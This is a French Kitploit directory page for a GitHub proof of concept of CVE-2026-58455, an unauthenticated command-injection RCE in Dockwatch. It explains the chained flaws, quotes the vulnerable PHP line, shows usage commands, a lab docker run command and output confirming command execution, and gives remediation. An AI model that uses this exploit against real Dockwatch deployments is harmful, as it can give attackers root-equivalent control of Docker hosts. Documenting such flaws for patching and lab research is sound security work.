Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-58455-PoC — PoC pour CVE-2026-58455 : Dockwatch <=0.6.567 RCE non authentifiée. Python utilisant uniquement la bibliothèque standard. | Kitploit
Outils/GitHubGitHub/boreas37/cve-2026-58455-poc
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionLabs et Pratique
GitHubboreas37/cve-2026-58455-poc

CVE-2026-58455-PoC

PoC pour CVE-2026-58455 : Dockwatch <=0.6.567 RCE non authentifiée. Python utilisant uniquement la bibliothèque standard.

Voir le dépôt
il y a 3 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-58455 — Dockwatch RCE non authentifié (contournement d'authentification + injection de commande)

Preuve de concept pour CVE-2026-58455 : exécution de code à distance non authentifiée dans Dockwatch (par Notifiarr), une interface web auto-hébergée de gestion de conteneurs Docker. Affecte toutes les versions jusqu'à 0.6.567.

Cause racine (vérifiée à partir du code source)

Trois failles enchaînées :

  1. Indicateur de session défini sans authentification — GET /includes/header.php exécute $_SESSION['IN_DOCKWATCH'] = true; pour tout visiteur. La couche AJAX (ajax/shared.php) ne vérifie que cet indicateur.
  2. exit() manquant après la redirection d'authentification — loader.php envoie un en-tête Location: login.php lorsque $_SESSION['authenticated'] est faux mais ne termine pas l'exécution, donc le reste de la requête continue de s'exécuter.
  3. Injection de commande OS — ajax/compose.php (m=composePull) construit une commande shell avec une entrée non assainie :
    root@kitploit:~
    $cmd = 'cd ' . $_POST['composePath'] . ' && docker-compose pull';
    $pull = $shell->exec($cmd . ' 2>&1');
    
    La sortie est reflétée dans la réponse HTTP.

Enchaînées : un attaquant distant non authentifié exécute des commandes OS arbitraires en tant qu'utilisateur du serveur web à l'intérieur du conteneur. Les déploiements typiques montent /var/run/docker.sock dans le conteneur → équivalent à root sur l'hôte.

Utilisation

root@kitploit:~
python3 dockwatch_rce_poc.py --url http://HOST:PORT --command "id; hostname"
python3 dockwatch_rce_poc.py --url http://localhost:8888            # defaults

Uniquement la bibliothèque standard Python 3.

Laboratoire (reproduction)

root@kitploit:~
docker run -d --name dockwatch-lab -p 8888:80 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  ghcr.io/notifiarr/dockwatch:v0.6.567

Sortie vérifiée

root@kitploit:~
$ python3 dockwatch_rce_poc.py --url http://localhost:8888 --command "id; hostname"
[+] Dockwatch fingerprint confirmed (200) <title>Dockwatch</title>
[+] Session primed (IN_DOCKWATCH flag set)
[*] ajax/compose.php responded HTTP 200, 100 bytes
[+] Command output recovered:
    uid=911(abc) gid=911(abc) groups=911(abc),281(unraiddocker),992(groupls7j),1000(users)
=> PASS (RCE confirmed)

Remédiation

Mettez à jour Dockwatch vers une version plus récente que 0.6.567. À titre d'atténuation, n'exposez pas Dockwatch à des réseaux non fiables et retirez la liaison du socket Docker si elle n'est pas requise.

Avertissement

Pour la recherche en sécurité autorisée et l'utilisation en laboratoire uniquement.

Télécharger l’outil